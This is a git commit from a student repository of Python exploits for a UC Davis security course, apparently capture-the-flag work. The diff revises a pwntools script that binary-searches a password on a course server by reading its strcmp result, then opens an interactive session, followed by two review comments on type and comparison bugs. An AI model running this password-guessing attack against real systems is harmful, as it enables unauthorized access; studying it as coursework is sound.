ucdavis-ecs189m

[RADIOACTIVE] python exploits for uc davis class ecs189m

commit 21c132719de02ba86debc6b7f28bf1c9abd58375
parent 61d11e1892cb90bbcc8f42d883a5cc7ee3e07156
Author: therealFIGBERT <figbertwelner@gmail.com>
Date:   Thu, 10 Oct 2019 19:07:28 -0700

Beginning of catch system for repeat passes

Diffstat:
Mthird_flag.py | 33++++++++++++++++++++++++---------
1 file changed, 24 insertions(+), 9 deletions(-)

diff --git a/third_flag.py b/third_flag.py @@ -1,19 +1,19 @@ from pwn import * -def str_to_dec(s): - num_vals = [(ord(char)-97) for char in s][-1::-1] +def str_to_dec(s: str) -> int: + num_vals = [(ord(char)-97) for char in s][::-1] lst = [] for pos, val in enumerate(num_vals): lst.append(val*(26**pos)) return sum(lst) -def dec_to_str(num): +def dec_to_str(num: int, max: str = 19) -> str: st = "" - for i in range(19,0,-1): - digit = int(num/(26**i)) if int(num/(26**i)) <= 25 else 25 + for a in range(max,0,-1): + digit = int(num/(26**a)) if int(num/(26**a)) <= 25 else 25 char = chr(digit+97) st += char - num -= digit*(26**i) + num -= digit*(26**a) char = chr(int(num)+97) st += char return st @@ -22,18 +22,20 @@ def passgen(low: str, high: str) -> str: return dec_to_str((str_to_dec(low)+str_to_dec(high))/2) cracked = False +len_limit = False attempt = 1 LO = "aaaaaaaaaaaaaaaaaaaa" HI = "zzzzzzzzzzzzzzzzzzzz" password = passgen(LO, HI) conn = remote("twinpeaks.cs.ucdavis.edu", 30004) print(conn.recv()) -while not cracked: +while not len_limit and not cracked: conn.sendline(password) print("Attempt {}:\nPass sent as:\n{}\nCurrent low:\n{}\nCurrent high:\n{}\n".format(attempt, password, LO, HI)) attempt += 1 response = conn.recvline_contains(b"strcmp") print("Server response:\n{}\n".format(response)) + previous_pass = password if b" -1 " in response: LO = password password = passgen(LO, HI) @@ -43,4 +45,17 @@ while not cracked: else: print("Password cracked as: {}".format(password)) cracked = True - conn.interactive() -\ No newline at end of file + conn.interactive() + if password is previous_pass: + len_limit = True +start_pos = 0 +for b in range(len(LO)): + if LO[b] is HI[b]: + start_pos += 1 + else: + break +pass_buffer = password[:start_pos] +pass_end = password[start_pos:] +print(password) +print(pass_buffer) +print(pass_end) +\ No newline at end of file
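Review bot: The new `max` parameter of `dec_to_str` is annotated `str` but defaults to the integer 19 and is passed straight to `range()`, and its name shadows the builtin `max`; a signature such as `def dec_to_str(num: int, width: int = 19) -> str:` would match how the value is used. The `num: int` annotation also does not hold for the caller visible in the next hunk, where `passgen` passes the result of `/2`, which is a float. For twenty-letter inputs that value is on the order of 26**20, more than a float can represent exactly, so the low-order letters are rounded. Floor division (`// 2` in `passgen`, `num // 26**a` here) would keep the arithmetic exact, and the rounding may well be the source of the repeated guesses this commit sets out to catch.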
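Review bot: The repeat check `if password is previous_pass:` in the last hunk compares object identity rather than contents, so a regenerated guess with the same text as the previous one will normally go undetected, because `dec_to_str` builds a fresh string on every call; it should read `if password == previous_pass:`. The same applies to `if LO[b] is HI[b]:` in the prefix loop, which only appears to work because CPython caches one-character strings; `if LO[b] == HI[b]:` is the portable form. Indentation is lost in this rendering and the `while` loop starts in the previous hunk, so it is not certain which block the repeat check belongs to. If it sits in the same `else` branch as `cracked = True`, it is reached only when the loop is about to end anyway and `len_limit` adds nothing.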